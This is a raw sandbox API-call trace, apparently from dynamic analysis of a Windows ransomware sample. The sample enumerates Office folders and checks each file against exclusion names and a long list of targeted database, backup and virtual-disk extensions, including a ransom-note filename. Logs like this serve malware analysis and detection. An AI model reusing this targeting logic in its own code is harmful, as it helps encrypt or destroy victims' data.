(lpString1="ACTDIR_M.VST", lpString2="ntuser.dat") returned -1 [0067.123] lstrcmpiW (lpString1="ACTDIR_M.VST", lpString2="perflogs") returned -1 [0067.123] lstrcmpiW (lpString1="ACTDIR_M.VST", lpString2="MSBuild") returned -1 [0067.123] lstrlenW (lpString="ACTDIR_M.VST") returned 12 [0067.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\*") returned 63 [0067.123] lstrcpyW (in: lpString1=0x2e2e8dc, lpString2="ACTDIR_M.VST" | out: lpString1="ACTDIR_M.VST") returned="ACTDIR_M.VST" [0067.123] lstrlenW (lpString="ACTDIR_M.VST") returned 12 [0067.123] lstrlenW (lpString="Ares865") returned 7 [0067.123] lstrcmpiW (lpString1="R_M.VST", lpString2="Ares865") returned 1 [0067.123] lstrlenW (lpString=".dll") returned 4 [0067.123] lstrcmpiW (lpString1="ACTDIR_M.VST", lpString2=".dll") returned 1 [0067.123] lstrlenW (lpString=".lnk") returned 4 [0067.123] lstrcmpiW (lpString1="ACTDIR_M.VST", lpString2=".lnk") returned 1 [0067.123] lstrlenW (lpString=".ini") returned 4 [0067.123] lstrcmpiW (lpString1="ACTDIR_M.VST", lpString2=".ini") returned 1 [0067.123] lstrlenW (lpString=".sys") returned 4 [0067.124] lstrcmpiW (lpString1="ACTDIR_M.VST", lpString2=".sys") returned 1 [0067.124] lstrlenW (lpString="ACTDIR_M.VST") returned 12 [0067.124] lstrlenW (lpString="bak") returned 3 [0067.124] lstrcmpiW (lpString1="VST", lpString2="bak") returned 1 [0067.124] lstrlenW (lpString="ba_") returned 3 [0067.124] lstrcmpiW (lpString1="VST", lpString2="ba_") returned 1 [0067.124] lstrlenW (lpString="dbb") returned 3 [0067.124] lstrcmpiW (lpString1="VST", lpString2="dbb") returned 1 [0067.124] lstrlenW (lpString="vmdk") returned 4 [0067.124] lstrcmpiW (lpString1=".VST", lpString2="vmdk") returned -1 [0067.124] lstrlenW (lpString="rar") returned 3 [0067.124] lstrcmpiW (lpString1="VST", lpString2="rar") returned 1 [0067.124] lstrlenW (lpString="zip") returned 3 [0067.124] lstrcmpiW (lpString1="VST", lpString2="zip") returned -1 [0067.124] lstrlenW (lpString="tgz") returned 3 [0067.124] lstrcmpiW (lpString1="VST", lpString2="tgz") returned 1 [0067.124] lstrlenW (lpString="vbox") returned 4 [0067.124] lstrcmpiW (lpString1=".VST", lpString2="vbox") returned -1 [0067.124] lstrlenW (lpString="vdi") returned 3 [0067.124] lstrcmpiW (lpString1="VST", lpString2="vdi") returned 1 [0067.124] lstrlenW (lpString="vhd") returned 3 [0067.124] lstrcmpiW (lpString1="VST", lpString2="vhd") returned 1 [0067.124] lstrlenW (lpString="vhdx") returned 4 [0067.124] lstrcmpiW (lpString1=".VST", lpString2="vhdx") returned -1 [0067.124] lstrlenW (lpString="avhd") returned 4 [0067.124] lstrcmpiW (lpString1=".VST", lpString2="avhd") returned -1 [0067.124] lstrlenW (lpString="db") returned 2 [0067.124] lstrcmpiW (lpString1="ST", lpString2="db") returned 1 [0067.124] lstrlenW (lpString="db2") returned 3 [0067.124] lstrcmpiW (lpString1="VST", lpString2="db2") returned 1 [0067.124] lstrlenW (lpString="db3") returned 3 [0067.124] lstrcmpiW (lpString1="VST", lpString2="db3") returned 1 [0067.124] lstrlenW (lpString="dbf") returned 3 [0067.124] lstrcmpiW (lpString1="VST", lpString2="dbf") returned 1 [0067.124] lstrlenW (lpString="mdf") returned 3 [0067.124] lstrcmpiW (lpString1="VST", lpString2="mdf") returned 1 [0067.124] lstrlenW (lpString="mdb") returned 3 [0067.125] lstrcmpiW (lpString1="VST", lpString2="mdb") returned 1 [0067.125] lstrlenW (lpString="sql") returned 3 [0067.125] lstrcmpiW (lpString1="VST", lpString2="sql") returned 1 [0067.125] lstrlenW (lpString="sqlite") returned 6 [0067.125] lstrcmpiW (lpString1="_M.VST", lpString2="sqlite") returned -1 [0067.125] lstrlenW (lpString="sqlite3") returned 7 [0067.125] lstrcmpiW (lpString1="R_M.VST", lpString2="sqlite3") returned -1 [0067.125] lstrlenW (lpString="sqlitedb") returned 8 [0067.125] lstrcmpiW (lpString1="IR_M.VST", lpString2="sqlitedb") returned -1 [0067.125] lstrlenW (lpString="xml") returned 3 [0067.125] lstrcmpiW (lpString1="VST", lpString2="xml") returned -1 [0067.125] lstrlenW (lpString="$er") returned 3 [0067.125] lstrcmpiW (lpString1="VST", lpString2="$er") returned 1 [0067.125] lstrlenW (lpString="4dd") returned 3 [0067.125] lstrcmpiW (lpString1="VST", lpString2="4dd") returned 1 [0067.125] lstrlenW (lpString="4dl") returned 3 [0067.125] lstrcmpiW (lpString1="VST", lpString2="4dl") returned 1 [0067.125] lstrlenW (lpString="^^^") returned 3 [0067.125] lstrcmpiW (lpString1="VST", lpString2="^^^") returned 1 [0067.125] lstrlenW (lpString="abs") returned 3 [0067.125] lstrcmpiW (lpString1="VST", lpString2="abs") returned 1 [0067.125] lstrlenW (lpString="abx") returned 3 [0067.125] lstrcmpiW (lpString1="VST", lpString2="abx") returned 1 [0067.125] lstrlenW (lpString="accdb") returned 5 [0067.125] lstrcmpiW (lpString1="M.VST", lpString2="accdb") returned 1 [0067.125] lstrlenW (lpString="accdc") returned 5 [0067.125] lstrcmpiW (lpString1="M.VST", lpString2="accdc") returned 1 [0067.125] lstrlenW (lpString="accde") returned 5 [0067.125] lstrcmpiW (lpString1="M.VST", lpString2="accde") returned 1 [0067.125] lstrlenW (lpString="accdr") returned 5 [0067.125] lstrcmpiW (lpString1="M.VST", lpString2="accdr") returned 1 [0067.125] lstrlenW (lpString="accdt") returned 5 [0067.125] lstrcmpiW (lpString1="M.VST", lpString2="accdt") returned 1 [0067.125] lstrlenW (lpString="accdw") returned 5 [0067.125] lstrcmpiW (lpString1="M.VST", lpString2="accdw") returned 1 [0067.125] lstrlenW (lpString="accft") returned 5 [0067.125] lstrcmpiW (lpString1="M.VST", lpString2="accft") returned 1 [0067.126] lstrlenW (lpString="adb") returned 3 [0067.126] lstrcmpiW (lpString1="VST", lpString2="adb") returned 1 [0067.126] lstrlenW (lpString="adb") returned 3 [0067.126] lstrcmpiW (lpString1="VST", lpString2="adb") returned 1 [0067.126] lstrlenW (lpString="ade") returned 3 [0067.126] lstrcmpiW (lpString1="VST", lpString2="ade") returned 1 [0067.126] lstrlenW (lpString="adf") returned 3 [0067.126] lstrcmpiW (lpString1="VST", lpString2="adf") returned 1 [0067.126] lstrlenW (lpString="adn") returned 3 [0067.126] lstrcmpiW (lpString1="VST", lpString2="adn") returned 1 [0067.126] lstrlenW (lpString="adp") returned 3 [0067.126] lstrcmpiW (lpString1="VST", lpString2="adp") returned 1 [0067.126] lstrlenW (lpString="alf") returned 3 [0067.126] lstrcmpiW (lpString1="VST", lpString2="alf") returned 1 [0067.126] lstrlenW (lpString="ask") returned 3 [0067.126] lstrcmpiW (lpString1="VST", lpString2="ask") returned 1 [0067.126] lstrlenW (lpString="btr") returned 3 [0067.126] lstrcmpiW (lpString1="VST", lpString2="btr") returned 1 [0067.126] lstrlenW (lpString="cat") returned 3 [0067.126] lstrcmpiW (lpString1="VST", lpString2="cat") returned 1 [0067.126] lstrlenW (lpString="cdb") returned 3 [0067.126] lstrcmpiW (lpString1="VST", lpString2="cdb") returned 1 [0067.126] lstrlenW (lpString="ckp") returned 3 [0067.126] lstrcmpiW (lpString1="VST", lpString2="ckp") returned 1 [0067.126] lstrlenW (lpString="cma") returned 3 [0067.126] lstrcmpiW (lpString1="VST", lpString2="cma") returned 1 [0067.126] lstrlenW (lpString="cpd") returned 3 [0067.126] lstrcmpiW (lpString1="VST", lpString2="cpd") returned 1 [0067.126] lstrlenW (lpString="dacpac") returned 6 [0067.126] lstrcmpiW (lpString1="_M.VST", lpString2="dacpac") returned -1 [0067.126] lstrlenW (lpString="dad") returned 3 [0067.126] lstrcmpiW (lpString1="VST", lpString2="dad") returned 1 [0067.126] lstrlenW (lpString="dadiagrams") returned 10 [0067.126] lstrcmpiW (lpString1="TDIR_M.VST", lpString2="dadiagrams") returned 1 [0067.126] lstrlenW (lpString="daschema") returned 8 [0067.126] lstrcmpiW (lpString1="IR_M.VST", lpString2="daschema") returned 1 [0067.126] lstrlenW (lpString="db-journal") returned 10 [0067.127] lstrcmpiW (lpString1="TDIR_M.VST", lpString2="db-journal") returned 1 [0067.127] lstrlenW (lpString="db-shm") returned 6 [0067.127] lstrcmpiW (lpString1="_M.VST", lpString2="db-shm") returned -1 [0067.127] lstrlenW (lpString="db-wal") returned 6 [0067.127] lstrcmpiW (lpString1="_M.VST", lpString2="db-wal") returned -1 [0067.127] lstrlenW (lpString="dbc") returned 3 [0067.127] lstrcmpiW (lpString1="VST", lpString2="dbc") returned 1 [0067.127] lstrlenW (lpString="dbs") returned 3 [0067.127] lstrcmpiW (lpString1="VST", lpString2="dbs") returned 1 [0067.127] lstrlenW (lpString="dbt") returned 3 [0067.127] lstrcmpiW (lpString1="VST", lpString2="dbt") returned 1 [0067.127] lstrlenW (lpString="dbv") returned 3 [0067.127] lstrcmpiW (lpString1="VST", lpString2="dbv") returned 1 [0067.127] lstrlenW (lpString="dbx") returned 3 [0067.127] lstrcmpiW (lpString1="VST", lpString2="dbx") returned 1 [0067.127] lstrlenW (lpString="dcb") returned 3 [0067.127] lstrcmpiW (lpString1="VST", lpString2="dcb") returned 1 [0067.127] lstrlenW (lpString="dct") returned 3 [0067.127] lstrcmpiW (lpString1="VST", lpString2="dct") returned 1 [0067.127] lstrlenW (lpString="dcx") returned 3 [0067.127] lstrcmpiW (lpString1="VST", lpString2="dcx") returned 1 [0067.127] lstrlenW (lpString="ddl") returned 3 [0067.127] lstrcmpiW (lpString1="VST", lpString2="ddl") returned 1 [0067.127] lstrlenW (lpString="dlis") returned 4 [0067.127] lstrcmpiW (lpString1=".VST", lpString2="dlis") returned -1 [0067.127] lstrlenW (lpString="dp1") returned 3 [0067.127] lstrcmpiW (lpString1="VST", lpString2="dp1") returned 1 [0067.127] lstrlenW (lpString="dqy") returned 3 [0067.127] lstrcmpiW (lpString1="VST", lpString2="dqy") returned 1 [0067.127] lstrlenW (lpString="dsk") returned 3 [0067.127] lstrcmpiW (lpString1="VST", lpString2="dsk") returned 1 [0067.127] lstrlenW (lpString="dsn") returned 3 [0067.127] lstrcmpiW (lpString1="VST", lpString2="dsn") returned 1 [0067.127] lstrlenW (lpString="dtsx") returned 4 [0067.127] lstrcmpiW (lpString1=".VST", lpString2="dtsx") returned -1 [0067.127] lstrlenW (lpString="dxl") returned 3 [0067.127] lstrcmpiW (lpString1="VST", lpString2="dxl") returned 1 [0067.127] lstrlenW (lpString="eco") returned 3 [0067.128] lstrcmpiW (lpString1="VST", lpString2="eco") returned 1 [0067.128] lstrlenW (lpString="ecx") returned 3 [0067.128] lstrcmpiW (lpString1="VST", lpString2="ecx") returned 1 [0067.128] lstrlenW (lpString="edb") returned 3 [0067.128] lstrcmpiW (lpString1="VST", lpString2="edb") returned 1 [0067.128] lstrlenW (lpString="epim") returned 4 [0067.128] lstrcmpiW (lpString1=".VST", lpString2="epim") returned -1 [0067.128] lstrlenW (lpString="fcd") returned 3 [0067.128] lstrcmpiW (lpString1="VST", lpString2="fcd") returned 1 [0067.128] lstrlenW (lpString="fdb") returned 3 [0067.128] lstrcmpiW (lpString1="VST", lpString2="fdb") returned 1 [0067.128] lstrlenW (lpString="fic") returned 3 [0067.128] lstrcmpiW (lpString1="VST", lpString2="fic") returned 1 [0067.128] lstrlenW (lpString="flexolibrary") returned 12 [0067.128] lstrlenW (lpString="fm5") returned 3 [0067.128] lstrcmpiW (lpString1="VST", lpString2="fm5") returned 1 [0067.128] lstrlenW (lpString="fmp") returned 3 [0067.128] lstrcmpiW (lpString1="VST", lpString2="fmp") returned 1 [0067.128] lstrlenW (lpString="fmp12") returned 5 [0067.128] lstrcmpiW (lpString1="M.VST", lpString2="fmp12") returned 1 [0067.128] lstrlenW (lpString="fmpsl") returned 5 [0067.128] lstrcmpiW (lpString1="M.VST", lpString2="fmpsl") returned 1 [0067.128] lstrlenW (lpString="fol") returned 3 [0067.128] lstrcmpiW (lpString1="VST", lpString2="fol") returned 1 [0067.128] lstrlenW (lpString="fp3") returned 3 [0067.130] lstrcmpiW (lpString1="VST", lpString2="fp3") returned 1 [0067.130] lstrlenW (lpString="fp4") returned 3 [0067.130] lstrcmpiW (lpString1="VST", lpString2="fp4") returned 1 [0067.130] lstrlenW (lpString="fp5") returned 3 [0067.130] lstrcmpiW (lpString1="VST", lpString2="fp5") returned 1 [0067.131] lstrlenW (lpString="fp7") returned 3 [0067.131] lstrcmpiW (lpString1="VST", lpString2="fp7") returned 1 [0067.131] lstrlenW (lpString="fpt") returned 3 [0067.131] lstrcmpiW (lpString1="VST", lpString2="fpt") returned 1 [0067.131] lstrlenW (lpString="frm") returned 3 [0067.131] lstrcmpiW (lpString1="VST", lpString2="frm") returned 1 [0067.131] lstrlenW (lpString="gdb") returned 3 [0067.131] lstrcmpiW (lpString1="VST", lpString2="gdb") returned 1 [0067.131] lstrlenW (lpString="gdb") returned 3 [0067.131] lstrcmpiW (lpString1="VST", lpString2="gdb") returned 1 [0067.131] lstrlenW (lpString="grdb") returned 4 [0067.131] lstrcmpiW (lpString1=".VST", lpString2="grdb") returned -1 [0067.131] lstrlenW (lpString="gwi") returned 3 [0067.131] lstrcmpiW (lpString1="VST", lpString2="gwi") returned 1 [0067.131] lstrlenW (lpString="hdb") returned 3 [0067.131] lstrcmpiW (lpString1="VST", lpString2="hdb") returned 1 [0067.131] lstrlenW (lpString="his") returned 3 [0067.131] lstrcmpiW (lpString1="VST", lpString2="his") returned 1 [0067.131] lstrlenW (lpString="ib") returned 2 [0067.131] lstrcmpiW (lpString1="ST", lpString2="ib") returned 1 [0067.131] lstrlenW (lpString="idb") returned 3 [0067.131] lstrcmpiW (lpString1="VST", lpString2="idb") returned 1 [0067.131] lstrlenW (lpString="ihx") returned 3 [0067.131] lstrcmpiW (lpString1="VST", lpString2="ihx") returned 1 [0067.131] lstrlenW (lpString="itdb") returned 4 [0067.131] lstrcmpiW (lpString1=".VST", lpString2="itdb") returned -1 [0067.131] lstrlenW (lpString="itw") returned 3 [0067.131] lstrcmpiW (lpString1="VST", lpString2="itw") returned 1 [0067.131] lstrlenW (lpString="jet") returned 3 [0067.131] lstrcmpiW (lpString1="VST", lpString2="jet") returned 1 [0067.131] lstrlenW (lpString="jtx") returned 3 [0067.131] lstrcmpiW (lpString1="VST", lpString2="jtx") returned 1 [0067.131] lstrlenW (lpString="kdb") returned 3 [0067.131] lstrcmpiW (lpString1="VST", lpString2="kdb") returned 1 [0067.131] lstrlenW (lpString="kexi") returned 4 [0067.131] lstrcmpiW (lpString1=".VST", lpString2="kexi") returned -1 [0067.131] lstrlenW (lpString="kexic") returned 5 [0067.131] lstrcmpiW (lpString1="M.VST", lpString2="kexic") returned 1 [0067.132] lstrlenW (lpString="kexis") returned 5 [0067.132] lstrcmpiW (lpString1="M.VST", lpString2="kexis") returned 1 [0067.132] lstrlenW (lpString="lgc") returned 3 [0067.132] lstrcmpiW (lpString1="VST", lpString2="lgc") returned 1 [0067.132] lstrlenW (lpString="lwx") returned 3 [0067.132] lstrcmpiW (lpString1="VST", lpString2="lwx") returned 1 [0067.132] lstrlenW (lpString="maf") returned 3 [0067.132] lstrcmpiW (lpString1="VST", lpString2="maf") returned 1 [0067.132] lstrlenW (lpString="maq") returned 3 [0067.132] lstrcmpiW (lpString1="VST", lpString2="maq") returned 1 [0067.132] lstrlenW (lpString="mar") returned 3 [0067.132] lstrcmpiW (lpString1="VST", lpString2="mar") returned 1 [0067.132] lstrlenW (lpString="marshal") returned 7 [0067.132] lstrcmpiW (lpString1="R_M.VST", lpString2="marshal") returned 1 [0067.132] lstrlenW (lpString="mas") returned 3 [0067.132] lstrcmpiW (lpString1="VST", lpString2="mas") returned 1 [0067.132] lstrlenW (lpString="mav") returned 3 [0067.132] lstrcmpiW (lpString1="VST", lpString2="mav") returned 1 [0067.132] lstrlenW (lpString="maw") returned 3 [0067.132] lstrcmpiW (lpString1="VST", lpString2="maw") returned 1 [0067.132] lstrlenW (lpString="mdbhtml") returned 7 [0067.132] lstrcmpiW (lpString1="R_M.VST", lpString2="mdbhtml") returned 1 [0067.132] lstrlenW (lpString="mdn") returned 3 [0067.132] lstrcmpiW (lpString1="VST", lpString2="mdn") returned 1 [0067.132] lstrlenW (lpString="mdt") returned 3 [0067.132] lstrcmpiW (lpString1="VST", lpString2="mdt") returned 1 [0067.132] lstrlenW (lpString="mfd") returned 3 [0067.132] lstrcmpiW (lpString1="VST", lpString2="mfd") returned 1 [0067.132] lstrlenW (lpString="mpd") returned 3 [0067.132] lstrcmpiW (lpString1="VST", lpString2="mpd") returned 1 [0067.132] lstrlenW (lpString="mrg") returned 3 [0067.132] lstrcmpiW (lpString1="VST", lpString2="mrg") returned 1 [0067.132] lstrlenW (lpString="mud") returned 3 [0067.132] lstrcmpiW (lpString1="VST", lpString2="mud") returned 1 [0067.132] lstrlenW (lpString="mwb") returned 3 [0067.132] lstrcmpiW (lpString1="VST", lpString2="mwb") returned 1 [0067.132] lstrlenW (lpString="myd") returned 3 [0067.133] lstrcmpiW (lpString1="VST", lpString2="myd") returned 1 [0067.133] lstrlenW (lpString="ndf") returned 3 [0067.133] lstrcmpiW (lpString1="VST", lpString2="ndf") returned 1 [0067.133] lstrlenW (lpString="nnt") returned 3 [0067.133] lstrcmpiW (lpString1="VST", lpString2="nnt") returned 1 [0067.133] lstrlenW (lpString="nrmlib") returned 6 [0067.133] lstrcmpiW (lpString1="_M.VST", lpString2="nrmlib") returned -1 [0067.133] lstrlenW (lpString="ns2") returned 3 [0067.133] lstrcmpiW (lpString1="VST", lpString2="ns2") returned 1 [0067.133] lstrlenW (lpString="ns3") returned 3 [0067.133] lstrcmpiW (lpString1="VST", lpString2="ns3") returned 1 [0067.133] lstrlenW (lpString="ns4") returned 3 [0067.133] lstrcmpiW (lpString1="VST", lpString2="ns4") returned 1 [0067.133] lstrlenW (lpString="nsf") returned 3 [0067.133] lstrcmpiW (lpString1="VST", lpString2="nsf") returned 1 [0067.133] lstrlenW (lpString="nv") returned 2 [0067.133] lstrcmpiW (lpString1="ST", lpString2="nv") returned 1 [0067.133] lstrlenW (lpString="nv2") returned 3 [0067.133] lstrcmpiW (lpString1="VST", lpString2="nv2") returned 1 [0067.133] lstrlenW (lpString="nwdb") returned 4 [0067.133] lstrcmpiW (lpString1=".VST", lpString2="nwdb") returned -1 [0067.133] lstrlenW (lpString="nyf") returned 3 [0067.133] lstrcmpiW (lpString1="VST", lpString2="nyf") returned 1 [0067.133] lstrlenW (lpString="odb") returned 3 [0067.133] lstrcmpiW (lpString1="VST", lpString2="odb") returned 1 [0067.133] lstrlenW (lpString="odb") returned 3 [0067.133] lstrcmpiW (lpString1="VST", lpString2="odb") returned 1 [0067.133] lstrlenW (lpString="oqy") returned 3 [0067.133] lstrcmpiW (lpString1="VST", lpString2="oqy") returned 1 [0067.133] lstrlenW (lpString="ora") returned 3 [0067.133] lstrcmpiW (lpString1="VST", lpString2="ora") returned 1 [0067.133] lstrlenW (lpString="orx") returned 3 [0067.133] lstrcmpiW (lpString1="VST", lpString2="orx") returned 1 [0067.133] lstrlenW (lpString="owc") returned 3 [0067.133] lstrcmpiW (lpString1="VST", lpString2="owc") returned 1 [0067.133] lstrlenW (lpString="p96") returned 3 [0067.133] lstrcmpiW (lpString1="VST", lpString2="p96") returned 1 [0067.133] lstrlenW (lpString="p97") returned 3 [0067.134] lstrcmpiW (lpString1="VST", lpString2="p97") returned 1 [0067.134] lstrlenW (lpString="pan") returned 3 [0067.134] lstrcmpiW (lpString1="VST", lpString2="pan") returned 1 [0067.134] lstrlenW (lpString="pdb") returned 3 [0067.134] lstrcmpiW (lpString1="VST", lpString2="pdb") returned 1 [0067.134] lstrlenW (lpString="pdm") returned 3 [0067.134] lstrcmpiW (lpString1="VST", lpString2="pdm") returned 1 [0067.134] lstrlenW (lpString="pnz") returned 3 [0067.134] lstrcmpiW (lpString1="VST", lpString2="pnz") returned 1 [0067.134] lstrlenW (lpString="qry") returned 3 [0067.134] lstrcmpiW (lpString1="VST", lpString2="qry") returned 1 [0067.134] lstrlenW (lpString="qvd") returned 3 [0067.134] lstrcmpiW (lpString1="VST", lpString2="qvd") returned 1 [0067.134] lstrlenW (lpString="rbf") returned 3 [0067.134] lstrcmpiW (lpString1="VST", lpString2="rbf") returned 1 [0067.134] lstrlenW (lpString="rctd") returned 4 [0067.134] lstrcmpiW (lpString1=".VST", lpString2="rctd") returned -1 [0067.134] lstrlenW (lpString="rod") returned 3 [0067.134] lstrcmpiW (lpString1="VST", lpString2="rod") returned 1 [0067.134] lstrlenW (lpString="rodx") returned 4 [0067.134] lstrcmpiW (lpString1=".VST", lpString2="rodx") returned -1 [0067.134] lstrlenW (lpString="rpd") returned 3 [0067.134] lstrcmpiW (lpString1="VST", lpString2="rpd") returned 1 [0067.134] lstrlenW (lpString="rsd") returned 3 [0067.134] lstrcmpiW (lpString1="VST", lpString2="rsd") returned 1 [0067.134] lstrlenW (lpString="sas7bdat") returned 8 [0067.134] lstrcmpiW (lpString1="IR_M.VST", lpString2="sas7bdat") returned -1 [0067.134] lstrlenW (lpString="sbf") returned 3 [0067.134] lstrcmpiW (lpString1="VST", lpString2="sbf") returned 1 [0067.134] lstrlenW (lpString="scx") returned 3 [0067.134] lstrcmpiW (lpString1="VST", lpString2="scx") returned 1 [0067.134] lstrlenW (lpString="sdb") returned 3 [0067.134] lstrcmpiW (lpString1="VST", lpString2="sdb") returned 1 [0067.134] lstrlenW (lpString="sdc") returned 3 [0067.134] lstrcmpiW (lpString1="VST", lpString2="sdc") returned 1 [0067.134] lstrlenW (lpString="sdf") returned 3 [0067.134] lstrcmpiW (lpString1="VST", lpString2="sdf") returned 1 [0067.135] lstrlenW (lpString="sis") returned 3 [0067.135] lstrcmpiW (lpString1="VST", lpString2="sis") returned 1 [0067.135] lstrlenW (lpString="spq") returned 3 [0067.135] lstrcmpiW (lpString1="VST", lpString2="spq") returned 1 [0067.135] lstrlenW (lpString="te") returned 2 [0067.135] lstrcmpiW (lpString1="ST", lpString2="te") returned -1 [0067.135] lstrlenW (lpString="teacher") returned 7 [0067.135] lstrcmpiW (lpString1="R_M.VST", lpString2="teacher") returned -1 [0067.135] lstrlenW (lpString="tmd") returned 3 [0067.135] lstrcmpiW (lpString1="VST", lpString2="tmd") returned 1 [0067.135] lstrlenW (lpString="tps") returned 3 [0067.135] lstrcmpiW (lpString1="VST", lpString2="tps") returned 1 [0067.135] lstrlenW (lpString="trc") returned 3 [0067.135] lstrcmpiW (lpString1="VST", lpString2="trc") returned 1 [0067.135] lstrlenW (lpString="trc") returned 3 [0067.135] lstrcmpiW (lpString1="VST", lpString2="trc") returned 1 [0067.135] lstrlenW (lpString="trm") returned 3 [0067.135] lstrcmpiW (lpString1="VST", lpString2="trm") returned 1 [0067.135] lstrlenW (lpString="udb") returned 3 [0067.135] lstrcmpiW (lpString1="VST", lpString2="udb") returned 1 [0067.135] lstrlenW (lpString="udl") returned 3 [0067.135] lstrcmpiW (lpString1="VST", lpString2="udl") returned 1 [0067.135] lstrlenW (lpString="usr") returned 3 [0067.135] lstrcmpiW (lpString1="VST", lpString2="usr") returned 1 [0067.135] lstrlenW (lpString="v12") returned 3 [0067.135] lstrcmpiW (lpString1="VST", lpString2="v12") returned 1 [0067.135] lstrlenW (lpString="vis") returned 3 [0067.135] lstrcmpiW (lpString1="VST", lpString2="vis") returned 1 [0067.135] lstrlenW (lpString="vpd") returned 3 [0067.135] lstrcmpiW (lpString1="VST", lpString2="vpd") returned 1 [0067.135] lstrlenW (lpString="vvv") returned 3 [0067.135] lstrcmpiW (lpString1="VST", lpString2="vvv") returned -1 [0067.135] lstrlenW (lpString="wdb") returned 3 [0067.135] lstrcmpiW (lpString1="VST", lpString2="wdb") returned -1 [0067.135] lstrlenW (lpString="wmdb") returned 4 [0067.135] lstrcmpiW (lpString1=".VST", lpString2="wmdb") returned -1 [0067.136] lstrlenW (lpString="wrk") returned 3 [0067.136] lstrcmpiW (lpString1="VST", lpString2="wrk") returned -1 [0067.136] lstrlenW (lpString="xdb") returned 3 [0067.136] lstrcmpiW (lpString1="VST", lpString2="xdb") returned -1 [0067.136] lstrlenW (lpString="xld") returned 3 [0067.136] lstrcmpiW (lpString1="VST", lpString2="xld") returned -1 [0067.136] lstrlenW (lpString="xmlff") returned 5 [0067.136] lstrcmpiW (lpString1="M.VST", lpString2="xmlff") returned -1 [0067.136] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2101d200, ftCreationTime.dwHighDateTime=0x1ca4888, ftLastAccessTime.dwLowDateTime=0x50526960, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2101d200, ftLastWriteTime.dwHighDateTime=0x1ca4888, nFileSizeHigh=0x0, nFileSizeLow=0x2b600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACTDIR_U.VST", cAlternateFileName="")) returned 1 [0067.136] lstrcmpiW (lpString1="ACTDIR_U.VST", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.136] lstrcmpiW (lpString1="ACTDIR_U.VST", lpString2="aoldtz.exe") returned -1 [0067.136] lstrcmpiW (lpString1="ACTDIR_U.VST", lpString2=".") returned 1 [0067.136] lstrcmpiW (lpString1="ACTDIR_U.VST", lpString2="..") returned 1 [0067.136] lstrcmpiW (lpString1="ACTDIR_U.VST", lpString2="windows") returned -1 [0067.136] lstrcmpiW (lpString1="ACTDIR_U.VST", lpString2="bootmgr") returned -1 [0067.136] lstrcmpiW (lpString1="ACTDIR_U.VST", lpString2="temp") returned -1 [0067.136] lstrcmpiW (lpString1="ACTDIR_U.VST", lpString2="pagefile.sys") returned -1 [0067.136] lstrcmpiW (lpString1="ACTDIR_U.VST", lpString2="boot") returned -1 [0067.136] lstrcmpiW (lpString1="ACTDIR_U.VST", lpString2="ids.txt") returned -1 [0067.136] lstrcmpiW (lpString1="ACTDIR_U.VST", lpString2="ntuser.dat") returned -1 [0067.136] lstrcmpiW (lpString1="ACTDIR_U.VST", lpString2="perflogs") returned -1 [0067.136] lstrcmpiW (lpString1="ACTDIR_U.VST", lpString2="MSBuild") returned -1 [0067.136] lstrlenW (lpString="ACTDIR_U.VST") returned 12 [0067.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ACTDIR_M.VST") returned 74 [0067.136] lstrcpyW (in: lpString1=0x2e2e8dc, lpString2="ACTDIR_U.VST" | out: lpString1="ACTDIR_U.VST") returned="ACTDIR_U.VST" [0067.136] lstrlenW (lpString="ACTDIR_U.VST") returned 12 [0067.136] lstrlenW (lpString="Ares865") returned 7 [0067.137] lstrcmpiW (lpString1="R_U.VST", lpString2="Ares865") returned 1 [0067.137] lstrlenW (lpString=".dll") returned 4 [0067.137] lstrcmpiW (lpString1="ACTDIR_U.VST", lpString2=".dll") returned 1 [0067.137] lstrlenW (lpString=".lnk") returned 4 [0067.137] lstrcmpiW (lpString1="ACTDIR_U.VST", lpString2=".lnk") returned 1 [0067.137] lstrlenW (lpString=".ini") returned 4 [0067.137] lstrcmpiW (lpString1="ACTDIR_U.VST", lpString2=".ini") returned 1 [0067.137] lstrlenW (lpString=".sys") returned 4 [0067.137] lstrcmpiW (lpString1="ACTDIR_U.VST", lpString2=".sys") returned 1 [0067.137] lstrlenW (lpString="ACTDIR_U.VST") returned 12 [0067.137] lstrlenW (lpString="bak") returned 3 [0067.137] lstrcmpiW (lpString1="VST", lpString2="bak") returned 1 [0067.137] lstrlenW (lpString="ba_") returned 3 [0067.137] lstrcmpiW (lpString1="VST", lpString2="ba_") returned 1 [0067.137] lstrlenW (lpString="dbb") returned 3 [0067.137] lstrcmpiW (lpString1="VST", lpString2="dbb") returned 1 [0067.137] lstrlenW (lpString="vmdk") returned 4 [0067.137] lstrcmpiW (lpString1=".VST", lpString2="vmdk") returned -1 [0067.137] lstrlenW (lpString="rar") returned 3 [0067.137] lstrcmpiW (lpString1="VST", lpString2="rar") returned 1 [0067.137] lstrlenW (lpString="zip") returned 3 [0067.137] lstrcmpiW (lpString1="VST", lpString2="zip") returned -1 [0067.137] lstrlenW (lpString="tgz") returned 3 [0067.137] lstrcmpiW (lpString1="VST", lpString2="tgz") returned 1 [0067.137] lstrlenW (lpString="vbox") returned 4 [0067.137] lstrcmpiW (lpString1=".VST", lpString2="vbox") returned -1 [0067.137] lstrlenW (lpString="vdi") returned 3 [0067.137] lstrcmpiW (lpString1="VST", lpString2="vdi") returned 1 [0067.137] lstrlenW (lpString="vhd") returned 3 [0067.137] lstrcmpiW (lpString1="VST", lpString2="vhd") returned 1 [0067.137] lstrlenW (lpString="vhdx") returned 4 [0067.137] lstrcmpiW (lpString1=".VST", lpString2="vhdx") returned -1 [0067.138] lstrlenW (lpString="avhd") returned 4 [0067.138] lstrcmpiW (lpString1=".VST", lpString2="avhd") returned -1 [0067.138] lstrlenW (lpString="db") returned 2 [0067.138] lstrcmpiW (lpString1="ST", lpString2="db") returned 1 [0067.138] lstrlenW (lpString="db2") returned 3 [0067.138] lstrcmpiW (lpString1="VST", lpString2="db2") returned 1 [0067.138] lstrlenW (lpString="db3") returned 3 [0067.138] lstrcmpiW (lpString1="VST", lpString2="db3") returned 1 [0067.138] lstrlenW (lpString="dbf") returned 3 [0067.138] lstrcmpiW (lpString1="VST", lpString2="dbf") returned 1 [0067.138] 